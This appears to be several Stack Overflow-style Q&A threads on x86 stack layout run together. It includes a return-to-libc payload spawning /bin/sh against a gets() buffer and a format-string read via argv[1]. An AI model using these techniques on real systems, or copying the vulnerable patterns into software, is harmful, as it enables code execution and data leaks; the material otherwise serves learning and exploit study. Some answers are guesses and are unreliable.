I'm having problems with a return-to-libc exploit. Nothing happens when I run it, not even a segmentation fault (and yes, I'm actually overflowing the stack).
This is my program:
int main(int argc, char **argv) {
char array[512];
gets(array);
}
I'm using gets instead of strcpy because my addresses start with 0x00, and strcpy would treat that byte as the end of the string, so I can't use it.
Here are the addresses that I need:
$ gdb main core
(gdb) p system
$1 = {<text variable, no debug info>} 0x179680 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0x16f6e0 <exit>
(gdb) x/s 0xbffffe3f
0xbffffe3f: "/bin/sh"
When inputting the right sequence, this happens:
eleanor@eleanor32:~/testing/root$ perl -e 'print "\x41"x516 . "\x80\x96\x17\x00" . "\xe0\xf6\x16\x00" . "\x3f\xfe\xff\xbf"' | ./main
eleanor@eleanor32:~/testing/root$
So, nothing.
But if I enter 520 'A's (0x41), then EIP is overwritten with 'A's. With 516 'A's nothing happens, but EIP contains the system address, followed on the stack by the exit address and then the /bin/sh pointer.
Why did nothing happen?
Let's look at some asm first:
Code
$ cat gets.c
int main(int argc, char **argv) {
char array[512];
gets(array);
}
Asm
$ gcc gets.c -o gets.s -S -fverbose-asm
$ cat gets.s
....
.globl main
.type main, @function
main:
leal 4(%esp), %ecx #,
andl $-16, %esp #,
pushl -4(%ecx) # (1)
pushl %ebp # 2
movl %esp, %ebp #,
pushl %ecx # 3
subl $516, %esp #,
leal -516(%ebp), %eax #, tmp60
movl %eax, (%esp) # tmp60,
call gets # << break here
addl $516, %esp #, << or here to see the stack picture
popl %ecx # (3')
popl %ebp # (2')
leal -4(%ecx), %esp # (1')
ret
.size main, .-main
The prologue and epilogue (which include the alignment code) are described in detail in "Understanding the purpose of some assembly statements".
Stack layout:
(char) array[0]
...
(char) array[511]
(32bit) saved %ecx - pushed by (3) - the address just above main's return address on the original stack; the epilogue restores %esp from it
(32bit) saved %ebp - pushed by (2)
(32bit) copy of the return address - pushed by (1) - ret does not use this copy; it uses the slot at -4(%ecx)
So, to change the return address of main, it is not enough to overwrite the stack slot that ret will use; you also have to reproduce the values saved by pushes (1), (2), and (3). Alternatively, you can embed the new return address in the array itself and overwrite only the value saved by (3) with the stack address of the embedded value + 4 (use a 516-byte string).
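The arithmetic in that last option can be modelled in a few lines of C. This is only a sketch: store_le32 and esp_after_epilogue are hypothetical helper names, not part of the original program. It shows how a 32-bit address is laid out in little-endian byte order (as in the perl command in the question) and where ret reads its target after "leal -4(%ecx), %esp".

```c
#include <stdint.h>

/* Store a 32-bit value in little-endian byte order, as x86 keeps it in memory. */
void store_le32(unsigned char out[4], uint32_t value) {
    out[0] = (unsigned char)(value & 0xFF);
    out[1] = (unsigned char)((value >> 8) & 0xFF);
    out[2] = (unsigned char)((value >> 16) & 0xFF);
    out[3] = (unsigned char)((value >> 24) & 0xFF);
}

/* Model of "leal -4(%ecx), %esp": ret then pops its target from saved_ecx - 4. */
uint32_t esp_after_epilogue(uint32_t saved_ecx) {
    return saved_ecx - 4;
}
```

For instance, if the new return address were embedded at a made-up stack address 0xbffff000, the saved %ecx would have to be overwritten with 0xbffff004.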
I suggest you use this source code to hack it:
$ cat getss.c
f()
{
char array[512];
gets(array);
}
int main(int argc, char **argv) {
f();
}
because f() has no stack realignment to deal with:
.globl f
.type f, @function
f:
pushl %ebp #
movl %esp, %ebp #,
subl $520, %esp #,
leal -512(%ebp), %eax #, tmp59
movl %eax, (%esp) # tmp59,
call gets #
leave
ret
.size f, .-f
Stack layout for f():
(char) array[0]
...
(char) array[511]
(32bit) old ebp
(32bit) return address
Breakpoint at the ret instruction in f() with 520 bytes of "A":
(gdb) x/w $sp
0xXXXXXa3c: 0x41414141
I want to write a function in assembler, callable from C, that writes a byte (char) to a file. Here is how the function should look in C:
void writebyte (FILE *f, char b)
{
fwrite(&b, 1, 1, f);
}
And here is the code that will call it:
#include <stdio.h>
extern void writebyte(FILE *, char);
int main(void) {
FILE *f = fopen("test.txt", "w");
writebyte(f, 1);
fclose(f);
return 0;
}
So far I have come up with the following assembler code:
.global writebyte
writebyte:
pushl %ebp
movl %esp, %ebp #standard params
pushl 12(%ebp) # pushing byte to the stack
pushl $1
pushl $1
pushl 8(%ebp) #file to write
call fwrite
popl %ebp
ret
I keep getting this from gdb:
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffa9702c in ?? ()
How do I write such a function in assembly?
EDIT: I am using Ubuntu 16.04
According to the cdecl convention, arguments are pushed in reverse order, so f should be pushed first and the pointer to b last. Also, the caller has to clean up the stack after calling fwrite().
As noted in the comments, b is received by value, but fwrite() needs a pointer to it. That pointer is equal to ebp + 12.
This seems to work for me:
.global writebyte
writebyte:
//create new stack frame
pushl %ebp
movl %esp, %ebp
//push the four arguments to stack (in reverse order)
pushl 8(%ebp)
pushl $1
pushl $1
//get pointer of "b" argument (%ebp+12) and move it to %eax
leal 12(%ebp), %eax
pushl %eax
//call fwrite()
call fwrite
//remove arguments from stack and pop %ebp
leave
ret
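For comparison, here is the same idea in plain C, as a sketch for checking the behaviour rather than a replacement for the assembly. writebyte_c and roundtrip_byte are hypothetical names introduced here; the round trip assumes tmpfile() is usable on the system.

```c
#include <stdio.h>

/* C equivalent of the assembly: b arrives by value, fwrite needs its address. */
void writebyte_c(FILE *f, char b) {
    fwrite(&b, 1, 1, f);
}

/* Write one byte to a temporary file and read it back.
   Returns the byte that was read, or -1 on failure. */
int roundtrip_byte(char b) {
    FILE *f = tmpfile();
    if (f == NULL) {
        return -1;
    }
    writebyte_c(f, b);
    rewind(f);
    int c = fgetc(f);
    fclose(f);
    return c == EOF ? -1 : c;
}
```

Taking &b works because a by-value parameter has its own storage; in the assembly version that storage is the caller's argument slot at 12(%ebp).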
I was just learning about format string vulnerabilities, which prompted this question.
Consider the following simple program:
#include<stdio.h>
void main(int argc, char **argv)
{
char *s="SomeString";
printf(argv[1]);
}
Now clearly, this code has a format string vulnerability: when the command line argument is %s, the value SomeString is printed, since printf pops the stack once.
What I don't understand is the structure of the stack when printf is called.
In my head I imagine the stack to be as follows:
grows from left to right ----->
main() ---> printf()-->
RET to libc_main | address of 's' | current registers| ret ptr to main | ptr to format string|
If this is the case, how does passing %s to the program cause the value of s to be popped?
(Or, if I am totally wrong about the stack structure, please correct me.)
The stack contents depend a lot on the following:
the CPU
the compiler
the calling conventions (i.e. how parameters are passed in the registers and on the stack)
the code optimizations performed by the compiler
This is what I get by compiling your tiny program with x86 mingw using gcc stk.c -S -o stk.s:
.file "stk.c"
.def ___main; .scl 2; .type 32; .endef
.section .rdata,"dr"
LC0:
.ascii "SomeString\0"
.text
.globl _main
.def _main; .scl 2; .type 32; .endef
_main:
LFB6:
.cfi_startproc
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
andl $-16, %esp
subl $32, %esp
call ___main
movl $LC0, 28(%esp)
movl 12(%ebp), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, (%esp)
call _printf
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
.cfi_endproc
LFE6:
.def _printf; .scl 2; .type 32; .endef
And this is what I get using gcc stk.c -S -O2 -o stk.s, that is, with optimizations enabled:
.file "stk.c"
.def ___main; .scl 2; .type 32; .endef
.section .text.startup,"x"
.p2align 2,,3
.globl _main
.def _main; .scl 2; .type 32; .endef
_main:
LFB7:
.cfi_startproc
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp
.cfi_def_cfa_register 5
andl $-16, %esp
subl $16, %esp
call ___main
movl 12(%ebp), %eax
movl 4(%eax), %eax
movl %eax, (%esp)
call _printf
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
.cfi_endproc
LFE7:
.def _printf; .scl 2; .type 32; .endef
As you can see, in the latter case there's no pointer to "SomeString" on the stack. In fact, the string isn't even present in the compiled code.
In this simple code there are no registers saved on the stack because there aren't any variables allocated to registers that need to be preserved across the call to printf().
So, the only things you get on the stack here are the string pointer (in the unoptimized build only), unused space due to stack alignment (andl $-16, %esp and subl $32, %esp align the stack and allocate space for local variables and outgoing arguments), printf()'s parameter, and the return address for returning from printf() back to main().
In the former case the pointer to "SomeString" and the printf()'s parameter (value of argv[1]) are quite far away from one another:
movl $LC0, 28(%esp) ; address of "SomeString" is at esp+28
movl 12(%ebp), %eax
addl $4, %eax
movl (%eax), %eax
movl %eax, (%esp) ; a copy of argv[1] (the pointer to the format string) is at esp
call _printf
To make the two addresses stored one right after the other on the stack, if that's what you want, you'd need to play with the code, compilation/optimization options or use a different compiler.
Or you could supply a format string in argv[1] such that printf() would reach it. You could, for example, include a number of fake parameters in the format string.
For example, if I compile this piece of code using gcc stk.c -o stk.exe and run it as stk.exe %u%u%u%u%u%u%s, I'll get the following output from it:
4200532268676042006264200532880015253SomeString
All of this is pretty hacky and it's not trivial to make it work right.
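The count of six %u conversions follows from the unoptimized listing: the format pointer is at esp, the first variadic slot at esp+4, and the pointer to "SomeString" at esp+28. A small sketch of that arithmetic, assuming 32-bit cdecl where each %u consumes one 4-byte word; dummies_needed and build_probe are hypothetical helpers, not anything printf provides:

```c
#include <stddef.h>

/* Number of 4-byte dummy conversions (such as %u) needed before the
   conversion that should read the word at esp + target_offset.
   The format pointer occupies esp + 0 and the first variadic slot esp + 4,
   so target_offset is assumed to be a multiple of 4 and at least 4. */
unsigned dummies_needed(unsigned target_offset) {
    return target_offset / 4 - 1;
}

/* Write `dummies` copies of "%u" followed by "%s" into buf.
   Returns the string length, or 0 if buf is too small. */
size_t build_probe(char *buf, size_t size, unsigned dummies) {
    size_t need = (size_t)dummies * 2 + 2;  /* characters, excluding the terminator */
    if (size < need + 1) {
        return 0;
    }
    size_t pos = 0;
    for (unsigned i = 0; i < dummies; i++) {
        buf[pos++] = '%';
        buf[pos++] = 'u';
    }
    buf[pos++] = '%';
    buf[pos++] = 's';
    buf[pos] = '\0';
    return pos;
}
```

With target_offset = 28 this gives six dummies, which matches the %u%u%u%u%u%u%s argument used above. A different compiler or optimization level would move the pointer and change the count.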
On x86 the stack on a function call could look something like:
: :
+--------------+
: alignment :
+--------------+
12(%ebp) | arg2 |
+--------------+
8(%ebp) | arg1 |
+--------------+
4(%ebp) | ret | -----> return address
+--------------+
(%ebp) | ebp | -----> previous ebp value
+--------------+
-4(%ebp) | local1 | -----> local vars, sometimes they can overflow ;-)
+--------------+
: alignment :
+--------------+
: :
If you compile with -fomit-frame-pointer, ebp is not saved on the stack. At different optimization levels some variables may disappear (be optimized out), and so on.
Other ABIs pass function arguments in registers instead of on the stack. Later, before calling another function, live registers may be spilled to the stack.
C code:
#include <stdio.h>
main() {
int i;
for (i = 0; i < 10; i++) {
printf("%s\n", "hello");
}
}
ASM:
.file "simple_loop.c"
.section .rodata
.LC0:
.string "hello"
.text
.globl main
.type main, @function
main:
.LFB0:
.cfi_startproc
pushl %ebp # push ebp onto stack
.cfi_def_cfa_offset 8
.cfi_offset 5, -8
movl %esp, %ebp # setup base pointer or stack ?
.cfi_def_cfa_register 5
andl $-16, %esp # ?
subl $32, %esp # ?
movl $0, 28(%esp) # i = 0
jmp .L2
.L3:
movl $.LC0, (%esp) # point stack pointer to "hello" ?
call puts # print "hello"
addl $1, 28(%esp) # i++
.L2:
cmpl $9, 28(%esp) # if i < 9
jle .L3 # goto l3
leave
.cfi_restore 5
.cfi_def_cfa 4, 4
ret
So I am trying to improve my understanding of x86 assembly code. For the above code, I annotated what I believe I understand. As for the lines marked with a question mark, could someone shed some light? Also, if any of my comments are off, please let me know.
andl $-16, %esp # ?
subl $32, %esp # ?
This reserves some space on the stack. First, the andl instruction rounds the %esp register down to the next lowest multiple of 16 bytes (exercise: find out what the binary value of -16 is to see why). Then, the subl instruction moves the stack pointer down a bit further (32 bytes), reserving some more space (which it will use next). I suspect this rounding is done so that access through the %esp register is slightly more efficient (but you'd have to inspect your processor data sheets to figure out why).
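The rounding can be reproduced in C. This is a minimal sketch with a hypothetical helper name, align_down_16, using 32-bit unsigned arithmetic to stand in for the register:

```c
#include <stdint.h>

/* Round addr down to a multiple of 16, like "andl $-16, %esp".
   As a 32-bit two's complement value, -16 is 0xFFFFFFF0,
   so the AND clears the low four bits and leaves the rest alone. */
uint32_t align_down_16(uint32_t addr) {
    return addr & (uint32_t)-16;
}
```

An address that is already a multiple of 16 is left unchanged; any other address moves down by at most 15 bytes.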
movl $.LC0, (%esp) # point stack pointer to "hello" ?
This places the address of the string "hello" onto the stack (this instruction doesn't change the value of the %esp register itself). Apparently your compiler considers it more efficient to move data onto the stack directly, rather than to use the push instruction.
I'm just curious about the following example:
#include<stdio.h>
int test();
int test(){
// int a = 5;
// int b = a+1;
return ;
}
int main(){
printf("%u\n",test());
return 0;
}
I compiled it with 'gcc -Wall -o semicolon semicolon.c' to create an executable
and 'gcc -Wall -S semicolon.c' to get the assembler code, which is:
.file "semicolon.c"
.text
.globl test
.type test, @function
test:
pushl %ebp
movl %esp, %ebp
subl $4, %esp
leave
ret
.size test, .-test
.section .rodata
.LC0:
.string "%u\n"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
call test
movl %eax, 4(%esp)
movl $.LC0, (%esp)
call printf
movl $0, %eax
addl $20, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",@progbits
Since I'm not much of an assembler pro, I only know that printf prints what is in eax,
but I don't fully understand what 'movl %eax, 4(%esp)' means; I assume it fills eax before calling test.
But what is the value then? What does 4(%esp) mean, and what does the value of esp mean?
If I uncomment the lines in test(), printf prints 6, which is what was written to eax ^^
Your assembly language annotated:
test:
pushl %ebp # Save the frame pointer
movl %esp, %ebp # Get the new frame pointer.
subl $4, %esp # Allocate some local space on the stack.
leave # Restore the old frame pointer/stack
ret
Note that nothing in test touches eax.
.size test, .-test
.section .rodata
.LC0:
.string "%u\n"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx # Point past the return address.
andl $-16, %esp # Align the stack.
pushl -4(%ecx) # Push the return address.
pushl %ebp # Save the frame pointer
movl %esp, %ebp # Get the new frame pointer.
pushl %ecx # save the old top of stack.
subl $20, %esp # Allocate some local space (for printf parameters and ?).
call test # Call test.
Note that at this point, nothing has modified eax. Whatever came into main is still here.
movl %eax, 4(%esp) # Save eax as a printf argument.
movl $.LC0, (%esp) # Send the format string.
call printf # Duh.
movl $0, %eax # Return zero from main.
addl $20, %esp # Deallocate local space.
popl %ecx # Restore the old top of stack.
popl %ebp # And the old frame pointer.
leal -4(%ecx), %esp # Fix the stack pointer,
ret
So, what gets printed out is whatever came in to main. As others have pointed out it is undefined: It depends on what the startup code (or the OS) has done to eax previously.
The semicolon has no return value; what you have there is an "empty return", like the one used to return from void functions, so the function doesn't return anything.
This actually causes a warning when compiling:
warning: `return' with no value, in function returning non-void
And I don't see anything placed in eax before calling test.
About 4(%esp): this refers to the memory at address esp + 4, i.e. the second word from the top of the stack. movl %eax, 4(%esp) stores eax there, as the second argument to printf.
The return value of an int function is passed in the EAX register. The test function does not set the EAX register because no return value is given. The result is therefore undefined.
A semicolon indeed has no value.
I think the correct answer is that a return <nothing> for an int function is an error, or at least has undefined behavior. That's why compiling this with -Wall yields
semi.c: In function ‘test’:
semi.c:6: warning: ‘return’ with no value, in function returning non-void
As for what 4(%esp) holds: it receives the contents of eax, in which nothing was (intentionally) stored, so printf will likely print whatever junk is left in that register. This could be the last expression evaluated in the function (as in your example) or something completely different. This is what "undefined" is all about. :)
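A minimal sketch of a well-defined variant, with the commented-out lines restored and an explicit return value. test_fixed is a name chosen here for illustration:

```c
/* Returns a defined value, so the caller no longer depends on
   whatever happened to be left in eax. */
int test_fixed(void) {
    int a = 5;
    int b = a + 1;
    return b;
}
```

With this version the printed value is guaranteed by the language, not by which register the compiler happened to use for b.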
I was just playing with the call stack, trying to change the return address of a function etc, and wound up writing this program in C:
#include<stdio.h>
void trace(int);
void func3(int);
void func2(int);
void func1(int);
int main(){
int a = 0xAAAA1111;
func1(0xFCFCFC01);
return 0;
}
void func1(int a){
int loc = 0xBBBB1111;
func2(0xFCFCFC02);
}
void func2(int a){
int loc1 = 0xCCCC1111;
int loc2 = 0xCCCC2222;
func3(0xFCFCFC03);
}
void func3(int a){
int loc1 = 0xDDDD1111;
int loc2 = 0xDDDD2222;
int loc3 = 0xDDDD3333;
trace(0xFCFCFC04);
}
void trace(int a){
int loc = 0xEEEE1111;
int *ptr = &loc;
do {
printf("0x%08X : %08X\n", ptr, *ptr, *ptr);
} while(*(ptr++) != 0xAAAA1111);
}
(sorry for the length)
This produced the following output (with comments that I added):
0xBF8144D4 : EEEE1111 //local int in trace
0xBF8144D8 : BF8144F8 //beginning of trace stack frame
0xBF8144DC : 0804845A //return address for trace to func3
0xBF8144E0 : FCFCFC04 //int passed to trace
0xBF8144E4 : 08048230 //(possibly) uninitialized padding
0xBF8144E8 : 00000000 //padding
0xBF8144EC : DDDD3333 //local int in func3
0xBF8144F0 : DDDD2222 //local int in func3
0xBF8144F4 : DDDD1111 //local int in func3
0xBF8144F8 : BF814518 //beginning of func3 stack frame
0xBF8144FC : 08048431 //return address for func3 to func2
0xBF814500 : FCFCFC03 //parameter passed to func3
0xBF814504 : 00000000 //padding
0xBF814508 : 00000000 //padding
0xBF81450C : 00000000 //padding
0xBF814510 : CCCC2222 //local int in func2
0xBF814514 : CCCC1111 //local int in func2
0xBF814518 : BF814538 //beginning of func2 stack frame
0xBF81451C : 0804840F //return address for func2 to func1
0xBF814520 : FCFCFC02 //parameter passed to func2
0xBF814524 : 00000000 //padding
0xBF814528 : BF816728 //uninitialized padding
0xBF81452C : B7DF3F4E //uninitialized padding
0xBF814530 : B7EA61D9 //uninitialized padding
0xBF814534 : BBBB1111 //local int in func1
0xBF814538 : BF814558 //beginning of func1 stack frame
0xBF81453C : 080483E8 //return address for func1 to main
0xBF814540 : FCFCFC01 //parameter passed to func1
0xBF814544 : 08049FF4 //(maybe) padding
0xBF814548 : BF814568 //(maybe) padding
0xBF81454C : 080484D9 //(maybe) padding
0xBF814550 : AAAA1111 //local int in main
I was wondering if anybody could fill me in on the blank spots here... I'm running Ubuntu linux compiling with gcc 4.3.3 (on an x86 -- AMD Turion 64)
What are the 0804... numbers? What's the third address up from the bottom? Is that the return address for main? If so, why is it out of order compared to the rest of the stack?
The 0x0804 numbers are return addresses, or pointers to code/data or something, while the 0xBF814 numbers are stack pointers
What's this:
0xBF814524 : 00000000 //padding?
0xBF814528 : BF816728 //I have no idea
0xBF81452C : B7DF3F4E //????
0xBF814530 : B7EA61D9 //????
seen just after the local int in func1?
Okay I have my stack dump almost completely filled in.
It looks like the compiler wants to have the parameters pushed onto the stack starting at a 0x.......0 address, and everything between the local variables of the calling function and the first parameter of the function being called seems to be padding (whether 0x00000000 or some uninitialized value). Some of them I'm unsure about because they look like code/data segment pointers, but I can't see them being used in the code: they're just there when the stack pointer gets reduced.
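That observation can be checked against the dump: the four parameter slots are at 0xBF8144E0, 0xBF814500, 0xBF814520 and 0xBF814540. A tiny sketch, with is_16_aligned as a hypothetical helper:

```c
#include <stdint.h>

/* True if addr is a multiple of 16, i.e. its last hex digit is 0. */
int is_16_aligned(uint32_t addr) {
    return (addr & 0xFu) == 0;
}
```

All four parameter addresses pass this check, while the address of the local in trace (0xBF8144D4) does not.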
And I know it's a HUGE no-no to touch the call stack in any kind of project, but that's okay. It's fun, right?
Also, Greg wants to see the assembly, so here it is:
.file "stack.c"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $20, %esp
movl $-1431695087, -8(%ebp)
movl $-50529279, (%esp)
call func1
movl $0, %eax
addl $20, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.globl func1
.type func1, @function
func1:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-1145368303, -4(%ebp)
movl $-50529278, (%esp)
call func2
leave
ret
.size func1, .-func1
.globl func2
.type func2, @function
func2:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-859041519, -4(%ebp)
movl $-859037150, -8(%ebp)
movl $-50529277, (%esp)
call func3
leave
ret
.size func2, .-func2
.globl func3
.type func3, @function
func3:
pushl %ebp
movl %esp, %ebp
subl $24, %esp
movl $-572714735, -4(%ebp)
movl $-572710366, -8(%ebp)
movl $-572705997, -12(%ebp)
movl $-50529276, (%esp)
call trace
leave
ret
.size func3, .-func3
.section .rodata
.LC0:
.string "0x%08X : %08X\n"
.text
.globl trace
.type trace, @function
trace:
pushl %ebp
movl %esp, %ebp
subl $40, %esp
movl $-286387951, -4(%ebp)
leal -4(%ebp), %eax
movl %eax, -8(%ebp)
.L10:
movl -8(%ebp), %eax
movl (%eax), %edx
movl -8(%ebp), %eax
movl (%eax), %eax
movl %edx, 12(%esp)
movl %eax, 8(%esp)
movl -8(%ebp), %eax
movl %eax, 4(%esp)
movl $.LC0, (%esp)
call printf
movl -8(%ebp), %eax
movl (%eax), %eax
cmpl $-1431695087, %eax
setne %al
addl $4, -8(%ebp)
testb %al, %al
jne .L10
leave
ret
.size trace, .-trace
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",@progbits
Inspecting the stack like this seems like one step too far away. I might suggest loading your program in a debugger, switching to the assembly language view, and single stepping through every machine instruction. Understanding of the CPU stack necessarily requires an understanding of the machine instructions operating on it, and this will be a more direct way to see what's going on.
As others mentioned, the structure of the stack is also highly dependent on the processor architecture you're working with.
Most likely those are stack canaries. Your compiler adds code to push additional data to the stack and read it back afterwards to detect stack overflows.
I'm guessing those values starting with 0x0804 are addresses in your program's code segment (like return addresses for function calls). The ones starting with 0xBF814 that you've labeled as return addresses are addresses on the stack -- data, not code. I'm guessing they're probably frame pointers.
As already pointed out, the 0xBF... are frame pointers and 0x08... return addresses.
The padding is due to alignment. Other unrecognized values are also padding, as the stack is not initialized to zero or any other value. Uninitialized variables and unused padding space will contain whatever bytes are in those memory locations.
The 0xBF... addresses will be links to the previous stack frame:
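0xBF8144D8 : BF8144F8 //saved frame pointer: link from trace's frame to func3's
0xBF8144DC : 0804845A //return address into func3
0xBF8144F8 : BF814518 //saved frame pointer: link from func3's frame to func2's
0xBF8144FC : 08048431 //return address into func2
0xBF814518 : BF814538 //saved frame pointer: link from func2's frame to func1's
0xBF81451C : 0804840F //return address into func1
0xBF814538 : BF814558 //saved frame pointer: link from func1's frame to main's
0xBF81453C : 080483E8 //return address into main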
The 0x08... addresses will be the addresses of the code to return to in each case.
I can't speak for the other stuff on the stack; you would have to step through the assembly language and see exactly what it is doing. I guess that it is aligning the start of each frame to a specific alignment so that __attribute__((aligned)) (or whatever it's called these days...) works.
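The frame links can be followed mechanically. The sketch below hard-codes the eight words quoted from the dump and walks the saved-frame-pointer chain. load and walk_frames are hypothetical helpers, and the model assumes the classic layout in which the return address sits 4 bytes above the saved EBP:

```c
#include <stddef.h>
#include <stdint.h>

/* One word of the dump: an address and the 32-bit value stored there. */
struct word {
    uint32_t addr;
    uint32_t value;
};

/* Saved EBP / return address pairs copied from the dump in the question. */
static const struct word dump[] = {
    {0xBF8144D8u, 0xBF8144F8u}, {0xBF8144DCu, 0x0804845Au},
    {0xBF8144F8u, 0xBF814518u}, {0xBF8144FCu, 0x08048431u},
    {0xBF814518u, 0xBF814538u}, {0xBF81451Cu, 0x0804840Fu},
    {0xBF814538u, 0xBF814558u}, {0xBF81453Cu, 0x080483E8u},
};

/* Look up a word in the dump; returns 1 and stores it in *out if present. */
static int load(uint32_t addr, uint32_t *out) {
    for (size_t i = 0; i < sizeof dump / sizeof dump[0]; i++) {
        if (dump[i].addr == addr) {
            *out = dump[i].value;
            return 1;
        }
    }
    return 0;
}

/* Follow the saved-EBP chain starting at frame base `ebp`.
   Stores up to `max` return addresses in `ret` and returns how many were found.
   The walk stops at the first frame whose words are not in the dump. */
size_t walk_frames(uint32_t ebp, uint32_t *ret, size_t max) {
    size_t n = 0;
    uint32_t saved, ra;
    while (n < max && load(ebp, &saved) && load(ebp + 4, &ra)) {
        ret[n++] = ra;
        ebp = saved;
    }
    return n;
}
```

Starting from trace's frame base (0xBF8144D8), the walk visits four frames and collects the four 0x0804... return addresses in call order, innermost first.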
The compiler uses EBP to store the frame's base address. It's been a while since I looked at this, so I may get the details a bit wrong, but the idea is like this.
You have three steps when calling a function:
The caller pushes the function's parameters onto the stack.
The caller uses the call instruction, which pushes the return address onto the stack, and jumps to the new function.
The called function pushes EBP onto the stack, and copies ESP into EBP:
(Note: functions that use the callee-saved registers EBX, ESI, or EDI must also save and restore them; some hand-written code simply saves all the GPRs with PUSHAD.)
push EBP
mov EBP, ESP
When the function returns it:
copies EBP back into ESP, releasing any local variables
pops EBP
executes the ret instruction, which pops off the return address and jumps there.
mov ESP, EBP
pop EBP
ret
The question is, why is EBP pushed, and why does ESP get copied into it?
When you enter the function ESP points to the lowest point on the stack for this function. Any variables you declare on the stack can be accessed as [ESP + offset_to_variable]. This is easy! But note that ESP must always point to the top of the stack, so when you declare a new variable on the stack, ESP changes. Now [ESP + offset_to_variable] isn't so great, because you have to remember what ESP was at the time the variable was allocated.
Instead of doing that, the first thing the function needs to do is to copy ESP into EBP. EBP won't change during the life of the function, so you can access all variables using [EBP + offset_to_variable]. But now you have another problem, because if the function calls another function, EBP will be overwritten. That's why EBP needs to be saved onto the stack before ESP is copied into it, so that it can be restored before returning to the calling function.
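The save-and-restore discipline can be tried out on a toy model. This is a sketch only: struct machine, enter_frame and leave_frame are made-up names, ESP and EBP are array indices and not real addresses, and there are no bounds checks.

```c
#include <stdint.h>

#define STACK_WORDS 64

/* Toy model: esp and ebp are indices into stack[], which grows toward index 0. */
struct machine {
    uint32_t stack[STACK_WORDS];
    uint32_t esp;
    uint32_t ebp;
};

static void push(struct machine *m, uint32_t value) {
    m->stack[--m->esp] = value;
}

static uint32_t pop(struct machine *m) {
    return m->stack[m->esp++];
}

/* Prologue: push EBP; mov EBP, ESP; then reserve `locals` words. */
void enter_frame(struct machine *m, uint32_t locals) {
    push(m, m->ebp);
    m->ebp = m->esp;
    m->esp -= locals;
}

/* Epilogue: mov ESP, EBP; pop EBP (what the leave instruction does). */
void leave_frame(struct machine *m) {
    m->esp = m->ebp;
    m->ebp = pop(m);
}
```

Entering a nested frame stores the caller's EBP at the new frame base, and leaving it brings both ESP and EBP back to their previous values, however many locals the inner frame reserved.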
Is this a debug or release build? I'd expect some padding with the debug builds for detecting Stack Overflows.